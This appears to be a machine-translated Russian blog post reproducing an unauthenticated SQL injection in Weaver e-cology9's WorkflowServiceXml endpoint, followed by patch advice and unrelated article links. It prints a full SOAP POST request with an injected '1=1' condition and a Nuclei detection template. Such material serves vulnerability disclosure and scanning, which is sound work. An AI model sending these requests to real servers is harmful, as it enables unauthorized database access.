[Повторение уязвимости] Panwei e-cology9 WorkflowServiceXml Уязвимость внедрения SQL-кода
Предисловие
Пан-микро-платформа приложений для совместного управления e-cology представляет собой набор корпоративного информационного портала, управления документами знаний, управления рабочими процессами, управления человеческими ресурсами, управления взаимоотношениями с клиентами, управления проектами, управления финансами, управления активами, управления цепочками поставок и центра обработки данных. Функции крупномасштабной платформы совместного управления предприятием.
Название уязвимости | Panwei e-cology9 WorkflowServiceXml Уязвимость внедрения SQL |
|---|---|
Общественное время | 2024-07-10 |
Тип угрозы | выполнение команды |
Описание уязвимости
При конфигурации по умолчанию неавторизованный злоумышленник может использовать эти лазейки для выполнения произвольных операторов SQL, тем самым вызывая любые действия. команды。
сфера влияния
Пан Микро э-экология9 < 10.64.1
Повторение уязвимости
POST /services/WorkflowServiceXml HTTP/1.1
Host: x.x.x.x
Content-Type: text/xml;charset=UTF-8
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
<soapenv:Header/>
<soapenv:Body>
<web:getHendledWorkflowRequestList>
<web:in0>1</web:in0>
<web:in1>1</web:in1>
<web:in2>1</web:in2>
<web:in3>1</web:in3>
<web:in4>
<web:string>1=1</web:string>
</web:in4>
</web:getHendledWorkflowRequestList>
</soapenv:Body>
</soapenv:Envelope>
сценарий ядер
id: Panwei e-cology9 WorkflowServiceXml Уязвимость внедрения SQL
info:
name: Panwei e-cology9 WorkflowServiceXml Уязвимость внедрения SQL
author: whgojp
severity: info
description: При конфигурации по умолчанию неавторизованный злоумышленник может использовать эти лазейки для выполнения произвольных операторов SQL, тем самым вызывая любые действия. команды
http:
- raw:
- |
POST /services/WorkflowServiceXml HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml;charset=UTF-8
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
<soapenv:Header/>
<soapenv:Body>
<web:getHendledWorkflowRequestList>
<web:in0>1</web:in0>
<web:in1>1</web:in1>
<web:in2>1</web:in2>
<web:in3>1</web:in3>
<web:in4>
<web:string>1=1</web:string>
</web:in4>
</web:getHendledWorkflowRequestList>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "getHendledWorkflowRequestListResponse"Исправления безопасности
В настоящее время выпущено официальное исправление безопасности, и затронутым пользователям рекомендуется выполнить обновление до последней версии:
Пан микроэкология 9 >= 10.64.1
Официальный адрес загрузки патча:
https://www.weaver.com.cn/cs/securityDownload.html
Мой блог скоро будет синхронизирован с сообществом разработчиков Tencent Cloud.,Приглашаем всех присоединиться к нам:https://cloud.tencent.com/developer/support-plan?invite_code=2g93y2r9ge1w0
Учебное пособие по Jetpack Compose для начинающих, базовые элементы управления и макет
Код js веб-страницы, фон частицы, код спецэффектов
【новый! Суперподробное】Полное руководство по свойствам компонентов Figma.
🎉Обязательно к прочтению новичкам: полное руководство по написанию мини-программ WeChat с использованием программного обеспечения Cursor.
[Забавный проект Docker] VoceChat — еще одно приложение для мгновенного чата (IM)! Может быть встроен в любую веб-страницу!
Как реализовать переход по странице в HTML (html переходит на указанную страницу)
Как решить проблему зависания и низкой скорости при установке зависимостей с помощью npm. Существуют ли доступные источники npm, которые могут решить эту проблему?
Серия From Zero to Fun: Uni-App WeChat Payment Practice WeChat авторизует вход в систему и украшает страницу заказа, создает интерфейс заказа и инициирует запрос заказа
Серия uni-app: uni.navigateЧтобы передать скачок значения
Апплет WeChat настраивает верхнюю панель навигации и адаптируется к различным моделям.
JS-время конвертации
Обеспечьте бесперебойную работу ChromeDriver 125: советы по решению проблемы chromedriver.exe не найдены
Поле комментария, щелчок мышью, специальные эффекты, js-код
Объект массива перемещения объекта JS
Как открыть разрешение на позиционирование апплета WeChat_Как использовать WeChat для определения местонахождения друзей
Я даю вам два набора из 18 простых в использовании фонов холста Power BI, так что вам больше не придется возиться с цветами!
Получить текущее время в js_Как динамически отображать дату и время в js
Вам необходимо изучить сочетания клавиш vsCode для форматирования и организации кода, чтобы вам больше не приходилось настраивать формат вручную.
У ChatGPT большое обновление. Всего за 45 минут пресс-конференция показывает, что OpenAI сделал еще один шаг вперед.
Copilot облачной разработки — упрощение разработки
Микросборка xChatGPT с низким кодом, создание апплета чат-бота с искусственным интеллектом за пять шагов
CUDA Out of Memory: идеальное решение проблемы нехватки памяти CUDA
Анализ кластеризации отдельных ячеек, который должен освоить каждый&MarkerгенетическийВизуализация
vLLM: мощный инструмент для ускорения вывода ИИ
CodeGeeX: мощный инструмент генерации кода искусственного интеллекта, который можно использовать бесплатно в дополнение к второму пилоту.
Машинное обучение Реальный бой LightGBM + настройка параметров случайного поиска: точность 96,67%
Бесшовная интеграция, мгновенный интеллект [1]: платформа больших моделей Dify-LLM, интеграция без кодирования и встраивание в сторонние системы, более 42 тысяч звезд, чтобы стать свидетелями эксклюзивных интеллектуальных решений.
LM Studio для создания локальных больших моделей
Как определить количество слоев и нейронов скрытых слоев нейронной сети?
